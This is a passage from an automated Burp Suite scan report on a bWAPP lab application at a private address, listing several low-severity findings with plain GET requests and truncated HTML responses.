    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13259

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
    ...[SNIP]...
    18.74. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_crypt_storage_3.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/ssii.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:54:40 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: secret=QW55IGJ1Z3M%2F; expires=Fri, 09-Mar-2018 03:54:40 GMT; path=/
    Connection: close
    Content-Type: text/html
    Content-Length: 12772

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.75. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_direct_object_ref_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_direct_object_ref_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13380

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.76. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_direct_object_ref_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_direct_object_ref_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13302

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.77. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_direct_object_ref_3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_direct_object_ref_3.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13438

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.78. http://192.168.52.147/bWAPP/insecure_iframe.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_iframe.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_iframe.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12751

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.79. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insuff_transp_layer_protect_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insuff_transp_layer_protect_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13263

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.80. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insuff_t